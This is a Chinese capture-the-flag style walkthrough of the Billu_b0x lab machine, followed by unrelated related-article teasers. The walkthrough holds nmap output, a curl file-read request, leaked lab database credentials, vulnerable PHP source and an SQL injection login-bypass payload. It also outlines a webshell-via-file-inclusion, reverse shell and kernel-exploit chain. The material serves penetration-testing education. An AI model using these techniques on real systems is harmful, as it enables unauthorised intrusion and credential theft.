Billu_b0x

信息收集

#正常進行信息收集就好Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-18 22:07 CST
Nmap scan report for 192.168.182.142 (192.168.182.142)
Host is up (0.00073s latency).PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-internal-ip-disclosure: 
|_  Internal IP Leaked: 127.0.1.1
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum: 
|   /test.php: Test page
|_  /images/: Potentially interesting directory w/ listing on 'apache/2.2.22 (ubuntu)'
MAC Address: 00:0C:29:A9:EF:A9 (VMware)Nmap done: 1 IP address (1 host up) scanned in 31.10 seconds

只開放了兩個端口,分別是22端口和80端口。貌似存在一個test.php測試頁面!突破點就是在80端口上了,一旦找到用戶名和密碼,就可進行ssh登錄嘗試。

滲透測試

首頁是這樣的!看到提示可能是存在sql注入? 這里進行了測試,發現貌似并沒有sql注入漏洞!

看看test測試頁面是什么:

哦?這里出現了參數file,這個file參數的值還是路徑! 那么很可能就是文件包含漏洞!

利用curl進行測試:

確定任意文件讀取的漏洞!嘗試讀取shadow文件!

沒有權限讀取!既然這樣的話,看看都存在什么文件吧,進行目錄爆破:

下面就是依次看看這些文件都是什么作用!

add.php

利用任意文件讀取漏洞,讀取這個文件的源碼:

<?phpecho '<form  method="post" enctype="multipart/form-data">Select image to upload:<input type="file" name=image><input type=text name=name value="name"><input type=text name=address value="address"><input type=text name=id value=1337 ><input type="submit" value="upload" name="upload">
</form>';
?>

C

這個界面打開是空白的,所以我們嘗試直接讀取這個文件里面的內容!

curl -d "file=c.php" http://192.168.182.142/test.php
<?php
#header( 'Z-Powered-By:its chutiyapa xD' );
header('X-Frame-Options: SAMEORIGIN');
header( 'Server:testing only' );
header( 'X-Powered-By:testing only' );ini_set( 'session.cookie_httponly', 1 );$conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");// Check connection
if (mysqli_connect_errno()){echo "connection failed ->  " . mysqli_connect_error();}
?>

發現數據庫的賬號和密碼!!

billu   b0x_billu

in

phpmy

數據庫!直接使用上面的數據庫賬號和密碼進行登錄即可!

在auth表里面找到了網站的登錄賬號和密碼!

嘗試直接登錄網站!

panel.php

成功登錄網站之后,便來到了panel界面!這個界面可以上傳文件:

可以上傳文件!來到了這里我就開始了上傳,發現在上傳的時候,只能上傳png jpg gif文件,一直繞過,發現繞不過去,當前的php版本信息是5.3.10 小于5.4版本,嘗試使用%df來進行繞過,但是發現并不能繞過!

這里就糊涂了,沒通過任意文件讀取,去看看panel文件的源碼是什么,而是轉到了ssh上面,嘗試無果!

回想起來當前的頁面,于是就看了下源碼!

<?php
session_start();include('c.php');
include('head2.php');
if(@$_SESSION['logged']!=true )
{header('Location: index.php', true, 302);exit();}echo "Welcome to billu b0x ";
echo '<form method=post style="margin: 10px 0px 10px 95%;"><input type=submit name=lg value=Logout></form>';
if(isset($_POST['lg']))
{unset($_SESSION['logged']);unset($_SESSION['admin']);header('Location: index.php', true, 302);
}
echo '<hr><br>';echo '<form method=post><select name=load><option value="show">Show Users</option><option value="add">Add User</option>
</select> &nbsp<input type=submit name=continue value="continue"></form><br><br>';
if(isset($_POST['continue']))
{$dir=getcwd();$choice=str_replace('./','',$_POST['load']);if($choice==='add'){include($dir.'/'.$choice.'.php');die();}if($choice==='show'){include($dir.'/'.$choice.'.php');die();}else{include($dir.'/'.$_POST['load']);}}if(isset($_POST['upload']))
{$name=mysqli_real_escape_string($conn,$_POST['name']);$address=mysqli_real_escape_string($conn,$_POST['address']);$id=mysqli_real_escape_string($conn,$_POST['id']);if(!empty($_FILES['image']['name'])){$iname=mysqli_real_escape_string($conn,$_FILES['image']['name']);$r=pathinfo($_FILES['image']['name'],PATHINFO_EXTENSION);$image=array('jpeg','jpg','gif','png');if(in_array($r,$image)){$finfo = @new finfo(FILEINFO_MIME); $filetype = @$finfo->file($_FILES['image']['tmp_name']);if(preg_match('/image\/jpeg/',$filetype )  || preg_match('/image\/png/',$filetype ) || preg_match('/image\/gif/',$filetype )){if (move_uploaded_file($_FILES['image']['tmp_name'], 'uploaded_images/'.$_FILES['image']['name'])){echo "Uploaded successfully ";$update='insert into users(name,address,image,id) values(\''.$name.'\',\''.$address.'\',\''.$iname.'\', \''.$id.'\')'; mysqli_query($conn, $update);}}else{echo "<br>i told you dear, only png,jpg and gif file are allowed";}}else{echo "<br>only png,jpg and gif file are allowed";}
}}?>

發現這個頁面存在文件包含漏洞!只要存在continue參數和load參數即可進行文件包含了!因此continue的參數值 為 任意,但是load參數的值是我們的馬子的地址就行!(那就好了 我們不需要直接傳php的馬了 穿圖片馬就行了)

直接在panel里面復制圖片馬的地址:

成功執行我們的代碼!接下來就是生成php的反彈shell 的馬,再利用文件包含漏洞進行getshell!

提權

直接利用kali中自帶的反彈shell的腳本進行getshell了!

拿到初始的shell之后,查看內核信息,這個版本之前遇到過很經典的內核漏洞!

利用

攻擊機上起php服務,利用靶機進行下載!

補充

其實我們在首頁就已經提示我們說“Show me your SQLI skills” 但是我們并沒有找到相關sql注入的漏洞!既然存在任意文件讀取漏洞,那么我們就可以利用他來讀取index.php的內容!

<?php
session_start();include('c.php');
include('head.php');
if(@$_SESSION['logged']!=true)
{$_SESSION['logged']='';}if($_SESSION['logged']==true &&  $_SESSION['admin']!='')
{echo "you are logged in :)";header('Location: panel.php', true, 302);
}
else
{
echo '<div align=center style="margin:30px 0px 0px 0px;">
<font size=8 face="comic sans ms">--==[[ billu b0x ]]==--</font> 
<br><br>
Show me your SQLI skills <br>
<form method=post>
Username :- <Input type=text name=un> &nbsp Password:- <input type=password name=ps> <br><br>
<input type=submit name=login value="let\'s login">';
}
if(isset($_POST['login']))
{$uname=str_replace('\'','',urldecode($_POST['un']));$pass=str_replace('\'','',urldecode($_POST['ps']));$run='select * from auth where  pass=\''.$pass.'\' and uname=\''.$uname.'\'';$result = mysqli_query($conn, $run);
if (mysqli_num_rows($result) > 0) {$row = mysqli_fetch_assoc($result);echo "You are allowed<br>";$_SESSION['logged']=true;$_SESSION['admin']=$row['username'];header('Location: panel.php', true, 302);}
else
{echo "<script>alert('Try again');</script>";
}}
echo "<font size=5 face=\"comic sans ms\" style=\"left: 0;bottom: 0; position: absolute;margin: 0px 0px 5px;\">B0X Powered By <font color=#ff9933>Pirates</font> ";?>

然后我們便可以找到三個關鍵的sql注入的過濾語句:

$uname=str_replace('\'','',urldecode($_POST['un']));
$pass=str_replace('\'','',urldecode($_POST['ps']));
$run='select * from auth where  pass=\''.$pass.'\' and uname=\''.$uname.'\'';

整個過濾是針對單引號進行的過濾!

我們只需要輸入:

select * from auth where pass='\'and uname='or 1=1-- \';
select * from auth where pass='\'and uname='or 1=1#';

這里的整體的思路是這樣的:當我們輸入“\”的時候,其實在select的語句中,是轉義字符的意思,那么我們針對select * from auth where pass='\'and uname='or 1=1-- \'; 來說就是pass=' 這個單引號和uname='的引號閉合!!!(\'and uname=)括號里面的內容就是pass的內容! 然后后面的or 1=1以及-- 注釋使得我們能夠成功的登錄到系統里面!

登陸進行就正常操作即可了!

這里還有一個知識點就是phpmyadmin的默認配置文件名字:config.inc.php 默認的路徑就是在phpmyadmin下面!

既然這里利用dirsearch發現了路徑:phpmy 那么猜測這個路徑下面可能存在著config.inc.php文件!

這里確實讀取到了這個文件!里面還有root的賬號和密碼!!直接ssh登錄即可!

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/209447.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/209447.shtml
英文地址,請注明出處:http://en.pswp.cn/news/209447.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

VSC改造MD編輯器及圖床方案分享

VSC改造MD編輯器及圖床方案分享 用了那么多md編輯器&#xff0c;到頭來還是覺得VSC最好用。這次就來分享一下我的blog文件編輯流吧。 這篇文章包括&#xff1a;VSC下md功能擴展插件推薦、圖床方案、blog文章管理方案 VSC插件 Markdown All in One Markdown Image - 粘粘圖片…

【電子通識】為什么電阻都是2.2、3.3、4.7、5.1這樣的小數,而不是整數?

剛開始接觸電路設計可能會對市面上已經有的電阻值如&#xff1a;2.2Ω、4.7Ω、5.1Ω、22Ω、47Ω、51Ω&#xff0c;通常都不是整數覺得非常困惑&#xff0c;所以查閱了一些資料&#xff0c;總結如下&#xff1a; 電阻是使用指數分布來設計生產的&#xff0c;即遵循國際電工委…

【CSP】202303-2_墾田計劃Python實現

文章目錄 [toc]試題編號試題名稱時間限制內存限制問題描述輸入格式輸出格式樣例輸入1樣例輸出1樣例解釋樣例輸入2樣例輸出2樣例解釋子任務Python實現 試題編號 202303-2 試題名稱 墾田計劃 時間限制 1.0s 內存限制 512.0MB 問題描述 頓頓總共選中了 n n n塊區域準備開墾田地&a…

基于STM32 + DMA介紹,應用和步驟詳解(ADC多通道)

前言 本篇博客主要學習了解DMA的工作原理和部分寄存器解析&#xff0c;針對ADC多通道來對代碼部分&#xff0c;應用部分作詳細講解&#xff0c;掌握代碼編程原理。本篇博客大部分是自己收集和整理&#xff0c;如有侵權請聯系我刪除。 本次博客開發板使用的是正點原子精英版&am…

23種策略模式之策略模式

文章目錄 前言優缺點使用場景角色定義UML模擬示例小結 前言 在軟件開發中&#xff0c;設計模式是為了解決常見問題而提供的一套可重用的解決方案。策略模式&#xff08;Strategy Pattern&#xff09;是其中一種常見的設計模式&#xff0c;它屬于行為型模式。該模式的核心思想是…

Java程序設計實驗6 | 集合類

*本文是博主對Java各種實驗的再整理與詳解&#xff0c;除了代碼部分和解析部分&#xff0c;一些題目還增加了拓展部分&#xff08;?&#xff09;。拓展部分不是實驗報告中原有的內容&#xff0c;而是博主本人自己的補充&#xff0c;以方便大家額外學習、參考。 &#xff08;解…

基于ssm的大型商場會員管理系統論文

摘 要 進入信息時代以來&#xff0c;很多數據都需要配套軟件協助處理&#xff0c;這樣可以解決傳統方式帶來的管理困擾。比如耗時長&#xff0c;成本高&#xff0c;維護數據困難&#xff0c;數據易丟失等缺點。本次使用數據庫工具MySQL和編程框架SSM開發的大型商場會員管理系統…

【漏洞復現】FLIR AX8紅外線熱成像儀命令執行漏洞

漏洞描述 eledyne FLIR 設計、開發、制造以及強大的傳感和意識技術。自透射熱圖像、可見光圖像、可見頻率分析、來自測量和診斷的先進威脅測量系統以及日常生活的創新解決方案。 Teledyne FLIR 提供多種產品用于政府、國防、工業和商業市場。我們的產品,緊急救援人員,軍事人…

插入排序與希爾排序(C語言實現)

1.插入排序 由上面的動圖可以知道插入排序的邏輯就是從第一個元素開始往后遍歷&#xff0c;如果找到比前一個元素小的&#xff08;或者大的&#xff09;就往前排&#xff0c;所以插入排序的每一次遍歷都會保證前面的數據是有序的&#xff0c;接下類用代碼進行講解。 我們這里傳…

bash中通過變量中的內容獲取對應的關聯數組

bash中通過變量中的內容獲取對應的關聯數組 Bash declare 手冊&#xff1a; https://phoenixnap.com/kb/bash-declare 實際問題&#xff1a; 在 bash 中創建了多個關聯數組&#xff0c;需要根據輸入的值&#xff0c;獲取不同的關聯數組。 可以使用 if 進行多次判斷&#xff…

智能優化算法應用:基于浣熊算法無線傳感器網絡(WSN)覆蓋優化 - 附代碼

智能優化算法應用&#xff1a;基于浣熊算法無線傳感器網絡(WSN)覆蓋優化 - 附代碼 文章目錄 智能優化算法應用&#xff1a;基于浣熊算法無線傳感器網絡(WSN)覆蓋優化 - 附代碼1.無線傳感網絡節點模型2.覆蓋數學模型及分析3.浣熊算法4.實驗參數設定5.算法結果6.參考文獻7.MATLAB…

解決HTTP錯誤500.19 - internal server error -內部服務器錯誤的終極指南

在開發和維護網絡應用程序時&#xff0c;難免會遇到各種HTTP錯誤代碼。其中&#xff0c;HTTP錯誤500.19 - 內部服務器錯誤可謂是最令人頭痛的問題之一。當你的應用程序遇到這個錯誤時&#xff0c;它似乎就像一道墻壁&#xff0c;擋住了你前進的道路。但別擔心&#xff0c;本篇技…

Git全局設置命令---設置提交人姓名

介紹 使用git命令設置提交人姓名 命令 git config --global user.name "超音速"

react-photo-view 的介紹、安裝、使用。

目錄 基本介紹 安裝 使用 基本介紹 react-photo-view 是一個基于 React 的圖片查看器組件&#xff0c;用于在網頁上展示和瀏覽圖片。該組件提供了用戶友好的界面和交互&#xff0c;可以輕松地在應用程序中集成并使用。 支持觸摸手勢&#xff0c;拖動/平移/物理效果滑動…

修改移遠提供的GobiNet、quectel-CM源碼,使其支持有方N720 4G模塊

最近在研究imx6ull linux下4G模塊驅動的移植&#xff0c;參考的移遠ec20的移植方法&#xff0c;添加了GobiNet驅動&#xff0c;編譯了quectel-CM工具&#xff0c;并且可以正常撥號&#xff0c;分配到ip&#xff0c;如下&#xff1a; ping外網也沒有壓力&#xff0c;如下…

軟件工程 考試重點

結構化分析 考慮數據和處理的需求分析方法&#xff0c;稱為結構分析方法&#xff08;SA&#xff09; 結構化分析基于 分解、抽象 的基本思想 分解&#xff1a;對于復雜的系統&#xff0c;為將復雜度降低到可以掌握的程度&#xff0c;可以把大問題分解為若干個小問題&#xf…

【go-zero】go-zero使用ent框架 如何使用源生sql完成查詢

背景 本篇教程我們采用的是go-zero的快速腳手架工具 simple-admin 框架的開發 github地址:https://github.com/suyuan32/simple-admin-core 因為框架推薦使用Ent 這篇教程我們則對Ent的基本使用的幾種形式進行一個總結 一、開啟ent的源生sql 1、simple-admin生成rpc 【go-…

QT 中 線程池 (備查)

QRunnable類 API 1&#xff09;在Qt中使用線程池需要先創建任務&#xff0c;添加到線程池中的每一個任務都需要是一個 QRunnable 類型&#xff0c;因此在程序中需要創建子類繼承 QRunnable 這個類。 2&#xff09;然后重寫 run() 方法&#xff0c;在這個函數中編寫要在線程池中…

RabbitMQ使用指南

介紹主要特點常用插件使用RabbitMQ的插件常用插件列表 應用場景Kafka與RabbitMq的區別主要優缺點安裝步驟插件安裝步驟 使用RabbitMqJava代碼示例拓展 介紹 RabbitMQ是由Erlang語言開發的&#xff0c;基于AMQP&#xff08;高級消息隊列協議&#xff09;協議實現的開源消息代理…

元宇宙紅色展廳VR虛擬展館提高受訓者的參與感

生活在和平年代的新一代青少年&#xff0c;可能對革命先烈英勇事跡難以有很深的體會&#xff0c;無法切實感受到中國共產黨無畏犧牲、誓死保家衛國的紅色精神&#xff0c;因此借助VR虛擬現實制作技術&#xff0c;讓參觀者們走近革命先烈中&#xff0c;感受老一輩無產階級革命家…